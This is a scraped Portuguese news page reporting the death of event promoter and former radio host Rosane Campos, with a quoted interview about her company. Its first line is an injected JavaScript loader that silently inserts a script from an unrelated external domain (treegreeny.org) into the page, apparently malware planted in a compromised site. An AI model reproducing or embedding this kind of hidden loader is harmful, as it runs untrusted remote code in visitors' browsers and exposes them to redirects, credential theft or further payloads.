;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Morre aos 58 anos Rosane Campos, ex-locutora da Rádio 96 FM e promotora de eventos. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Morre aos 58 anos Rosane Campos, ex-locutora da Rádio 96 FM e promotora de eventos.

Faleceu no fim da manhã desta quinta-feira (16),  a produtora artística e empresária Rosane Campos, 58 anos. Ainda não há informação da causa morte.

Ex-moradora de Muriaé, Rosane atualmente residia em Petrópolis/RJ, e durante muito tempo foi um dos destaque do cenário cultural de Muriaé, promovendo eventos de músicas e outros segmentos, principalmente nos anos 90 e 2000. Ela foi a criadora do Troféu Personalidades, que premiava as empresas e profissionais que se destacavam no ano. Ela também trabalhou como locutora em rádios da cidade.

Há uma semana, Rosane perdeu sua mãe Rosalva Campos, que foi sepultada em Muriaé.

Não há informações, sobre local e nem horário do velório e sepultamento.

Rosane era diretora executiva da RC Multimídia, e organizava o Troféu Cidade Imperial, onde premiava as melhores empresas em diversos segmentos, na região de Petrópolis.

Em uma entrevista no ano de 2017, ela falou sobre seu trabalho: ”

A RC Multimídia foi criada em 1987 na cidade de Muriaé. A partir do ano de 2000 ampliamos nosso leque de serviços e passamos a atuar também em outros Estados do Brasil. Tivemos sede por 11 anos na cidade de Juiz de Fora, onde ainda atuamos, e hoje completamos 6 anos fixados aqui em Petrópolis/RJ.

Temos uma equipe fixa pequena, somos eu, minha sócia Regina Corrêa e mais 3 pessoas que trabalham diretamente no atendimento. O maior número de pessoas que trabalham com a gente é terceirizado, atuam durante o preparo dos eventos e no dia propriamente dito. Somamos cerca de 60 a 100 terceirizados ou até mais, dependendo do evento.

Temos muito carinho e responsabilidade com o Troféu CIDADE IMPERIAL desde a pesquisa até a entrega da premiação. Temos duas edições ao ano: uma em Itaipava e região e outra na região central. Além disso organizamos o Prêmio Petrópolis Fashion, também fixo em nosso calendário. Não trabalhamos apenas com eventos relacionados a premiações, mas com certeza esses eventos têm lugar mais que especial em nosso dia a dia, pois é um prazer reconhecer os talentos que atuam em nossa cidade em todas as áreas.”

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.